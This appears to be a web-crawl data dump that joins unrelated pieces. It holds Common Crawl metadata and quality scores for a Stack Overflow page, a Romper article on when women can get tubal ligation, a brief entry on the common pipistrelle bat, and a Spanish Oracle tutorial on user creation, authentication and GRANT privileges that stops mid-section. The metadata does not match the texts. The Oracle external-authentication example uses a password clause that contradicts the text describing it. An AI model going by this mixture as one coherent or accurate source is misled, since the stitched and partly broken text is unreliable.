"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:F73JDLENPQZB2RVLMVR5BPC2RD6M7U2E",
"WARC-Concurrent-To": "<urn:uuid:2cab4bec-ad1a-4078-ba66-7ff01577e9f3>",
"WARC-Date": "2019-05-21T17:58:39Z",
"WARC-IP-Address": "151.101.129.69",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:DZTNX2K4TEUDCJP6TOMJTDAD3CHYXWBC",
"WARC-Record-ID": "<urn:uuid:668dd0b4-37ca-4765-916f-da777cccf711>",
"WARC-Target-URI": "https://stackoverflow.com/questions/10864853/when-exactly-is-it-leak-safe-to-use-anonymous-inner-classes",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:4eae40ea-72cb-412c-900b-777e0f5341dc>"
},
"warc_info": "isPartOf: CC-MAIN-2019-22\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-234-169-21.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
4,
5,
133,
134,
265,
266,
293,
294,
444,
445,
611,
612,
656,
708,
783,
865,
866,
897,
953,
991,
1021,
1031,
1039,
1040,
1077,
1096,
1097,
1138,
1139,
1174,
1216,
1281,
1282,
1338,
1362,
1420,
1426,
1429,
1430,
1592,
1593,
1600,
1601,
1907,
1908,
2025,
2026,
2030,
2031,
2301,
2302,
2331,
2332,
2612,
2613,
2640,
2674,
2750,
2834,
2865,
2891,
2967,
3042,
3112,
3183,
3184,
3221,
3222,
3498,
3499,
3811,
3812,
4235,
4236,
4706,
4707,
4732,
4733,
4791,
4894,
4944,
5065,
5138,
5139,
5174,
5175,
5457,
5458,
5825,
5826,
6098,
6099,
6135,
6136,
6492,
6493,
6540,
6541,
7205,
7206,
7238,
7239,
7313,
7406,
7560,
7817,
7818,
7842,
7843,
8367,
8368,
8858,
8859,
8890,
8891,
9436,
9437,
9458,
9459,
9532,
9616,
9762,
9885,
9886,
10309,
10310,
10375,
10376,
10401,
10443,
10461,
10515,
10544,
10550,
10577,
10583,
10584,
10616,
10638,
10670,
10691,
10697,
10699,
10700,
10802,
10803,
10828,
10874,
10901,
10902,
10927,
10972,
11025,
11073,
11107,
11108,
11145,
11187,
11239,
11249,
11250,
11275,
11276,
11332,
11338,
11340,
11341,
11708,
11709,
11776,
11777,
11802,
11848,
11875,
11876,
11901,
11949,
11983,
11984,
12021,
12079,
12122,
12179,
12189,
12195,
12197,
12198,
12477,
12478,
12489,
12490,
12810,
12811,
12817,
12997,
13003,
13369,
13376,
13608,
13614,
14083,
14090,
14195,
14196,
14208,
14209,
14309,
14310
],
"line_end_idx": [
4,
5,
133,
134,
265,
266,
293,
294,
444,
445,
611,
612,
656,
708,
783,
865,
866,
897,
953,
991,
1021,
1031,
1039,
1040,
1077,
1096,
1097,
1138,
1139,
1174,
1216,
1281,
1282,
1338,
1362,
1420,
1426,
1429,
1430,
1592,
1593,
1600,
1601,
1907,
1908,
2025,
2026,
2030,
2031,
2301,
2302,
2331,
2332,
2612,
2613,
2640,
2674,
2750,
2834,
2865,
2891,
2967,
3042,
3112,
3183,
3184,
3221,
3222,
3498,
3499,
3811,
3812,
4235,
4236,
4706,
4707,
4732,
4733,
4791,
4894,
4944,
5065,
5138,
5139,
5174,
5175,
5457,
5458,
5825,
5826,
6098,
6099,
6135,
6136,
6492,
6493,
6540,
6541,
7205,
7206,
7238,
7239,
7313,
7406,
7560,
7817,
7818,
7842,
7843,
8367,
8368,
8858,
8859,
8890,
8891,
9436,
9437,
9458,
9459,
9532,
9616,
9762,
9885,
9886,
10309,
10310,
10375,
10376,
10401,
10443,
10461,
10515,
10544,
10550,
10577,
10583,
10584,
10616,
10638,
10670,
10691,
10697,
10699,
10700,
10802,
10803,
10828,
10874,
10901,
10902,
10927,
10972,
11025,
11073,
11107,
11108,
11145,
11187,
11239,
11249,
11250,
11275,
11276,
11332,
11338,
11340,
11341,
11708,
11709,
11776,
11777,
11802,
11848,
11875,
11876,
11901,
11949,
11983,
11984,
12021,
12079,
12122,
12179,
12189,
12195,
12197,
12198,
12477,
12478,
12489,
12490,
12810,
12811,
12817,
12997,
13003,
13369,
13376,
13608,
13614,
14083,
14090,
14195,
14196,
14208,
14209,
14309,
14310,
14400
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 14400,
"ccnet_original_nlines": 208,
"rps_doc_curly_bracket": 0.001805559964850545,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4435398280620575,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.012389379553496838,
"rps_doc_frac_lines_end_with_ellipsis": 0.01913876086473465,
"rps_doc_frac_no_alph_words": 0.18053096532821655,
"rps_doc_frac_unique_words": 0.2787381112575531,
"rps_doc_mean_word_length": 4.780466556549072,
"rps_doc_num_sentences": 160,
"rps_doc_symbol_to_word_ratio": 0.001415929989889264,
"rps_doc_unigram_entropy": 5.5905537605285645,
"rps_doc_word_count": 2314,
"rps_doc_frac_chars_dupe_10grams": 0.03724462166428566,
"rps_doc_frac_chars_dupe_5grams": 0.06463568657636642,
"rps_doc_frac_chars_dupe_6grams": 0.04646537825465202,
"rps_doc_frac_chars_dupe_7grams": 0.041764598339796066,
"rps_doc_frac_chars_dupe_8grams": 0.03724462166428566,
"rps_doc_frac_chars_dupe_9grams": 0.03724462166428566,
"rps_doc_frac_chars_top_2gram": 0.007231969852000475,
"rps_doc_frac_chars_top_3gram": 0.008859160356223583,
"rps_doc_frac_chars_top_4gram": 0.005423970054835081,
"rps_doc_books_importance": -1593.0457763671875,
"rps_doc_books_importance_length_correction": -1593.0457763671875,
"rps_doc_openwebtext_importance": -677.8702392578125,
"rps_doc_openwebtext_importance_length_correction": -677.8702392578125,
"rps_doc_wikipedia_importance": -740.3078002929688,
"rps_doc_wikipedia_importance_length_correction": -740.3078002929688
},
"fasttext": {
"dclm": 0.32118910551071167,
"english": 0.9361398220062256,
"fineweb_edu_approx": 2.6808736324310303,
"eai_general_math": 0.5858280062675476,
"eai_open_web_math": 0.30152755975723267,
"eai_web_code": 0.5723727345466614
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.0285",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "5",
"label": "Social/Forum"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,044,455,807,536,561,300
|
When Can You Get Your Tubes Tied? Your Age Makes A Big Difference
By
Share
Getting your tubes tied isn't a particularly common topic of conversation for most of us. Until recently, I had only had one conversation about tubal ligation in my life, and any thoughts I had on the matter felt like they belonged very far in the very distant future. Getting your tubes tied is a topic for old people, and a relatively simple procedure, right? Well, not exactly. So when can you get your tubes tied? It's not as simple as you'd think.
There is no strict age requirement for having your tubes tied, but states and insurance companies might have varying requirements if you are seeking a tubal ligation at a young age, according to Dr. Nicole Scogin, OB-GYN at the All About Women Obstetrics and Gynecology Clinic in Gainesville, Florida, in an interview with Romper. "Federally funded insurances require a federal sterilization form that specifies an age of 21 to make this decision and have the cost be covered by their insurance," she says. That’s not to say that you can’t have your tubes tied at a younger age if you are paying out of pocket or going through a non-federally funded insurance plan. However, it can be difficult to get a doctor to agree to perform a tubal ligation if you are choosing to do so at a young age and before you have any children.
If you are looking to have a tubal ligation before having any children and at a young age (considered to be younger than your mid-20s by many doctors), you can technically have the procedure done but you might have difficulty convincing a doctor to do the procedure. Apparently this is due to the high rate of regret that young patients report in the years following their tubal ligation. A study on sterilization in the United States in Obstetrics and Gynecology reported that "Young age at the time of sterilization is the strongest predictor of future regret. Women under the age of 30 at the time of the procedure were twice as likely as women older than 30 to report regretting having the procedure performed."
Giphy
The type of procedure you can have might depend on whether you are combining the surgery with either having a c-section or a vaginal birth. If you are having your tubes tied following having a baby, the procedure would likely involve going through your belly button; if you are having a tubal ligation more than six weeks after having a baby, you might need to have a procedure that involves a few more incisions.
One way to have a tubal ligation is directly after having given birth by cesarean section, within 24-48 hours of giving birth vaginally, or once you've healed for at least six weeks after either kind of delivery. Dr. Scogin, explains, "You can opt for postpartum sterilization that's done immediately postpartum during a c-section and we can tie your tubes assuming we can reach them. Or you can have postpartum sterilization that's done within the first 24-48 hours immediately following your vaginal delivery." Because the uterus is enlarged from giving birth, doctors can more easily reach the tubes using an incision underneath the umbilicus.
Tubal ligation is a procedure that is done under general anesthesia to permanently close your fallopian tubes, ensuring that you don't become pregnant because sperm is unable to meet the egg that would otherwise travel down the tube, according to Planned Parenthood. It is designed to be a permanent procedure, despite the temporary image the phrase invokes. Planned Parenthood also pointed out, "You still get your period after tubal ligation — you just can’t get pregnant."
A natural time to have a tubal ligation is directly after giving birth, but if you are opting to have your tubes tied but aren't delivering a baby in the future, you can have a tubal ligation done laparoscopically so long as you haven't given birth within the last six weeks. Dr. Scogin explains that a laparoscopic tubal ligation typically involves a single incision through the umbilicus or belly button, but can sometimes require other small incisions in order to reach the tubes.
Giphy
There are various ways doctors use to actually "tie" the tubes, none of which involve tying them into neat little bows, which is the mental picture the term lends itself to. Instead, Dr. Scogin says, doctors can "burn the tubes, place clamps on the tubes , or completely remove them." The first two options usually require only one incision, whereas as removing the tubes altogether requires multiple incisions because "if you remove them you need some assistant ports."
Dr. Scogin recommends discussing with your doctor which type of tubal ligation you'd prefer based on your particular needs. "Patients with a strong family history of ovarian cancer, should sometimes opt for removing the tubes. There is a 67 [percent] decrease in the risk for ovarian cancer if you remove the tubes because of the way epithelial cancers develop."
However, if you are looking for a birth control method, Dr. Scogin suggested considering other methods, including hormonal IUDs (that can even help address other problems like painful periods or excessive bleeding) or a male vasectomy. Because tubal ligation is a permanent method, the risk for regret, especially if a patient is very young, can be high. "There are ways to reverse it but they are not often successful," said Dr. Scogin, "The risk for regret is fairly high in studies, especially in patients younger than 30, it can be as high as 25 [percent]." Alternatively, she pointed out that a "vasectomy is an in-office procedure, it doesn't take anesthesia, and the risk for regret for men is about 5 [percent], even under age 30."
Because having your tubes tied is a simpler procedure to complete when you have just given birth, it's a topic for consideration for women as they believe they are finished having children. It's also something some women consider even if they haven't had any children and don't plan to, although many women report that convincing a doctor to perform a tubal ligation on a young woman is an uphill battle.
Giphy
Virginia gynecologist Yekaterina Rabkin, in a conversation with Slate, explained that she did everything in her power to only perform tubal ligations during C-sections: “Otherwise, you expose someone to surgical risk without any improvement in efficacy, a higher risk of ectopic pregnancy [due to procedural failure], and the issue of regret … I genuinely believe that a tubal ligation is not the best option for contraception for most people.”
So while it might seem like a simple procedure, there is clearly a lot of consideration that should go into your decision, especially because tubal ligation is a procedure for permanent sterilization. Dr. Scoggin explains, "The procedure is very difficult to reverse; they have to understand it's meant to be a permanent procedure. There are ways to reverse it but they are not often successful."
Whether or not you decide to get your tubes tied is, of course, your own prerogative, but it's helpful to know about the roadblocks you may face along the way.
Check out Romper's new video series, Bearing The Motherload, where disagreeing parents from different sides of an issue sit down with a mediator and talk about how to support (and not judge) each other’s parenting perspectives. New episodes air Mondays on Facebook.
|
{
"url": "https://www.romper.com/p/when-can-you-get-your-tubes-tied-your-age-makes-a-big-difference-8497521",
"source_domain": "www.romper.com",
"snapshot_id": "crawl=CC-MAIN-2018-47",
"warc_metadata": {
"Content-Length": "32755",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:63T76TK5HMDKIOAKGIFS4BSYDOOYTM5B",
"WARC-Concurrent-To": "<urn:uuid:083e4947-748a-4838-bf37-617a726b40e3>",
"WARC-Date": "2018-11-17T08:28:37Z",
"WARC-IP-Address": "151.101.201.132",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:55FHXEOTSV5UYKNAFKPNUQRL4XS7ACUY",
"WARC-Record-ID": "<urn:uuid:51d8048f-6a5e-4084-afcb-6e858a8f882f>",
"WARC-Target-URI": "https://www.romper.com/p/when-can-you-get-your-tubes-tied-your-age-makes-a-big-difference-8497521",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:448252cf-f429-40cc-a08a-74ffca823b38>"
},
"warc_info": "isPartOf: CC-MAIN-2018-47\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-228-195-45.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
66,
67,
70,
76,
77,
530,
531,
1357,
1358,
2074,
2075,
2081,
2082,
2496,
2497,
3144,
3145,
3621,
3622,
4106,
4107,
4113,
4114,
4585,
4586,
4949,
4950,
5690,
5691,
6096,
6097,
6103,
6104,
6549,
6550,
6947,
6948,
7108,
7109
],
"line_end_idx": [
66,
67,
70,
76,
77,
530,
531,
1357,
1358,
2074,
2075,
2081,
2082,
2496,
2497,
3144,
3145,
3621,
3622,
4106,
4107,
4113,
4114,
4585,
4586,
4949,
4950,
5690,
5691,
6096,
6097,
6103,
6104,
6549,
6550,
6947,
6948,
7108,
7109,
7374
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 7374,
"ccnet_original_nlines": 39,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4775707423686981,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0062111797742545605,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1304347813129425,
"rps_doc_frac_unique_words": 0.3636363744735718,
"rps_doc_mean_word_length": 4.7683024406433105,
"rps_doc_num_sentences": 53,
"rps_doc_symbol_to_word_ratio": 0.0006901299930177629,
"rps_doc_unigram_entropy": 5.418996334075928,
"rps_doc_word_count": 1243,
"rps_doc_frac_chars_dupe_10grams": 0.017209380865097046,
"rps_doc_frac_chars_dupe_5grams": 0.07558629661798477,
"rps_doc_frac_chars_dupe_6grams": 0.037793148308992386,
"rps_doc_frac_chars_dupe_7grams": 0.037793148308992386,
"rps_doc_frac_chars_dupe_8grams": 0.029019739478826523,
"rps_doc_frac_chars_dupe_9grams": 0.017209380865097046,
"rps_doc_frac_chars_top_2gram": 0.03728698939085007,
"rps_doc_frac_chars_top_3gram": 0.02193352021276951,
"rps_doc_frac_chars_top_4gram": 0.01214780006557703,
"rps_doc_books_importance": -751.8363647460938,
"rps_doc_books_importance_length_correction": -751.8363647460938,
"rps_doc_openwebtext_importance": -383.4199523925781,
"rps_doc_openwebtext_importance_length_correction": -383.4199523925781,
"rps_doc_wikipedia_importance": -222.74893188476562,
"rps_doc_wikipedia_importance_length_correction": -222.74893188476562
},
"fasttext": {
"dclm": 0.3281307816505432,
"english": 0.9648897647857666,
"fineweb_edu_approx": 2.212883710861206,
"eai_general_math": 0.16504085063934326,
"eai_open_web_math": 0.40946274995803833,
"eai_web_code": 0.033304329961538315
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "618.122",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Women — Health and hygiene, Children — Health and hygiene, Gynecology, and Pediatrics"
}
},
"secondary": {
"code": "618.1",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Women — Health and hygiene, Children — Health and hygiene, Gynecology, and Pediatrics"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "16",
"label": "Personal Blog"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
1,294,932,062,858,410,000
|
Common Pipistrelle
Common PipistrelleCommon Pipistrelle
Latin name: Pipistrellus pipistrellus
The Common Pipistrelle is the most commonly encountered bat in Aldernery and is recognisable from it’s broad wings and jerky flight pattern. Often hunts in fixed paths over grasslands, woodland and urban areas. Most active for two hours before and after dawn and dusk respectively. During this period a single individual is capable of consuming over 3000 insects which they eat on the wing.
Echolocation Frequency: Strongest at 45 kHz.
|
{
"url": "http://www.alderneywildlife.org/wild-alderney/mammals/common-pipistrelle",
"source_domain": "www.alderneywildlife.org",
"snapshot_id": "crawl=CC-MAIN-2018-43",
"warc_metadata": {
"Content-Length": "24461",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:4E6K6XSDHZMDG47JECFI7ZI7WBTLOYDR",
"WARC-Concurrent-To": "<urn:uuid:cd0fe9b3-0397-49ad-994e-3505a18bffbf>",
"WARC-Date": "2018-10-22T23:12:27Z",
"WARC-IP-Address": "23.185.0.1",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:QPB7JCX3K2ERIMKE55UWHPPH3MW22CPS",
"WARC-Record-ID": "<urn:uuid:789f04be-c4ea-42c5-a3cc-0bee0aeca570>",
"WARC-Target-URI": "http://www.alderneywildlife.org/wild-alderney/mammals/common-pipistrelle",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:adcfbb99-0c16-4ce3-8a87-b0fc867397bc>"
},
"warc_info": "isPartOf: CC-MAIN-2018-43\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for October 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-79-252-22.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
19,
20,
57,
58,
96,
97,
488,
489,
490
],
"line_end_idx": [
19,
20,
57,
58,
96,
97,
488,
489,
490,
534
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 534,
"ccnet_original_nlines": 9,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3483146131038666,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.12359551340341568,
"rps_doc_frac_unique_words": 0.797468364238739,
"rps_doc_mean_word_length": 5.607594966888428,
"rps_doc_num_sentences": 5,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.030514717102051,
"rps_doc_word_count": 79,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.07674943655729294,
"rps_doc_frac_chars_top_3gram": 0,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -50.517738342285156,
"rps_doc_books_importance_length_correction": -63.38935470581055,
"rps_doc_openwebtext_importance": -27.96098518371582,
"rps_doc_openwebtext_importance_length_correction": -40.832603454589844,
"rps_doc_wikipedia_importance": -22.13413429260254,
"rps_doc_wikipedia_importance_length_correction": -35.00575256347656
},
"fasttext": {
"dclm": 0.02828270010650158,
"english": 0.8833385109901428,
"fineweb_edu_approx": 3.0616586208343506,
"eai_general_math": 0.4505109190940857,
"eai_open_web_math": 0.515083372592926,
"eai_web_code": 0.0005403200048021972
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "599.93",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Zoology",
"level_3": "Mammals"
}
},
"secondary": {
"code": "591.57",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Zoology",
"level_3": ""
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "1",
"label": "Remember"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-4,236,406,071,215,216,000
|
Administración de usuarios en Oracle
1. Creación de usuarios
Una de las más básicas tareas de un administrador de base de datos es identificar los usuarios. Cada usuario que conecta en la base de datos debe de tener una cuenta. En las cuentas compartidas son difíciles de aplicar una auditoria.
Para crear un usuario utilizamos la sentencia CREATE USER. Cuando creas una cuenta como mínimo tienes que asignar un único nombre (username) y una contraseña para poder autenticarse.
Para cambiar alguno de los atributos que se le ha añadido al usuario creado se utiliza la sentencia ALTER USER.
2. Autenticación Oracle
Cuando uno se conecta con una instancia de una base de datos la cuenta de usuario debe de estar autenticada. ORACLE provee tres métodos de autenticación para nuestra cuenta de usuario.
AUTENTICACIÓN MEDIANTE PASSWORD:
Cuando un usuario conecta con una base de datos verifica que este usuario y la contraseña introducida almacenada en la base de datos, sea correcta. Las contraseñas se guardan encriptadas en la base de datos (en el data dictionary).
SQL > CREATE USER david IDENTIFIED BY tititus;
En este caso tititus es la contraseña de david que será guardada encriptada en la base de datos.
AUTENTICACIÓN EXTERNA:
Cuando un usuario conecta con la base de datos se verifica que el nombre de usuario es el mismo que el nombre de usuario del sistema operativo para permitir la validación.
No se almacenan las cuentas en la base de datos de ninguna forma. Estas cuentas están siempre referidas con OPS$ .A partir de la versión 10g puedes configurar OS_AUTHENT_PREFIX en el spfile
SQL > CREATE USER ops$david IDENTIFIED BY tititus;
Mediante IDENTIFIED EXTERNALLY decimos a la base de datos que nuestra cuenta es externa y tiene que ser validada con el sistema operativo.
AUTENTICACIÓN GLOBAL:
Cuando un usuario se conecta con la base de datos se verifica globalmente cuando la información pasa por una opción avanzada de seguridad ( ADVANCED SECURITY OPTION ) para la autenticación tal como Kerberos, RADIUS ….
Para las cuentas globales no se almacena tampoco nada en la base de datos.
SQL > CREATE USER david IDENTIFIED GLOBALLY AS ‘CN=alumnos,OU=campus .......’
Mediante IDENTIFIED GLOBALLY decimos a la base de datos que nuestra cuenta se autentica globalmente, mediante otra opción de seguridad avanzada.
3. Asignaciones a los usuarios
ASIGNACIÓN DE UN USUARIO A UN TABLESPACE ( DEFAULT TABLESPACE )
Mediante esta sentencia asignamos un usuario a un tablespace, este será su tablespace por defecto cuando creamos un usuario.
SQL > CREATE USER david IDENTIFIED BY tititus DEFAULT TABLESPACE users;
Mediante esta sentencia, en caso de tener creado ya el usuario le asignamos un tablespace.
SQL > ALTER USER david DEFAULT TABLESPACE users;
La base de datos toma un tablespace por defecto, en caso de querer cambiar este tablespace utilizamos la siguiente sentencia
SQL > ALTER DATABASE DEFAULT TABLESPACE users;
ASIGNACIÓN DE UN USUARIO A UN TABLESPACE TEMPORAL
Un tablespace temporal se utiliza para almacenar “segmentos” temporales que son creados durante operaciones como ORDER BY,SELECT DISTINCT, MERGE JOIN o CREATE INDEX. A veces a los usuarios se les asocia un tablespace temporal para realizar este tipo de operaciones, cuando estas operaciones finalizan este segmento temporal que se ha creado exclusivamente para la operación desaparece.
SQL > CREATE USER david IDENTIFIED BY tititus DEFAULT TABLESPACE users TEMPORARY TABLESPACE temp;
Mediante TEMPORARY TABLESPACE asignamos como tablespace temporal temp al usuario david. En caso de que el usuario esté creado si queremos asignarle un tablespace temporal utilizamos ALTER USER
SQL > ALTER USER david TEMPORARY TABLESPACE Temp;
ASIGNACIÓN DE UN PERFIL A UN USUARIO
Al igual que podemos asignar un tablespace a un usuario, también podemos asignarle un perfil (profile). El principal perfil ( profile ) por defecto se denomina default.
Si el usuario no está lo podemos crear de la siguiente forma:
SQL > CREATE USER david IDENTIFIED BY tititus
DEFAULT TABLESPACE users
TEMPORARY TABLESPACE temp
PROFILE resource_profile;
En caso de que el usuario ya esté creado al igual que en los anteriores casos utilizamos la sentencia ALTER USER.
SQL > ALTER USER david PROFILE resource_profile;
BORRADO DE UN USUARIO
Para borrar un usuario utilizamos la sentencia DROP USER, podemos opcionalmente incluir la opción CASCADE, se utiliza para borrar recursivamente los objetos del usuario que se pretende borrar.
SQL > DROP USER david CASCADE
OTORGANDO PRIVILEGIOS (GRANTING)
A un usuario podemos otorgarle una serie de privilegios. Un privilegio permite a un usuario acceder a ciertos objetos o realizar ciertas acciones:.
– Privilegios sobre Objetos ( Object privileges ) a permisos sobre vistas, tablas, secuencias, procedimientos, paquetes.
– Privilegios del Sistema ( System privileges ) a permisos sobre “niveles de la base de datos” como pueden ser conexión a la base de datos, creación de usuarios, limitar cuentas.
– Privilegios sobre Roles ( Role privileges ) a muchos permisos son otorgados mediante roles agrupando un conjunto de privilegios.
Para otorgar privilegios utilizamos la sentencia GRANT, para quitar un privilegio o permiso a un usuario utilizamos la sentencia REVOKE
EJEMPLOS:
Privilegio sobre una tabla:
SQL > GRANT ALL ON tabla_alumnos TO david
Siendo tabla_alumnos una tabla de nuestra base de datos y david un usuario de esta, hemos asignado mediante GRANT ALL,todos los permisos al usuario david sobre esta tabla.
GRANT ALL = permisos SELECT, INSERT, UPDATE, DELETE
Si queremos asignar sólo uno de estos permisos utilizamos la misma sentencia pero con el permiso que queramos otorgar.
SQL > GRANT SELECT ON tabla_alumnos TO david
SQL > GRANT SELECT,INSERT ON tabla_alumnos TO david
Privilegio sobre una vista:
Para el caso de las vistas podemos a un usuario otorgar permisos SELECT, INSERT, UPDATE, DELETE, DEBUG, REFERENCES.
Siendo vista_alumnos una vista de nuestra base de datos y david un usuario de esta:
Otorgamos al usuario david todos los permisos sobre la vista vista_alumnos.
SQL > GRANT ALL ON vista_alumnos TO david
Otorgamos al usuario david algunos permisos sobre la vista_alumnos
SQL > GRANT SELECT ON vista_alumnos TO david
SQL > GRANT SELECT,INSERT ON vista_alumnos TO david
Privilegio sobre una secuencia:
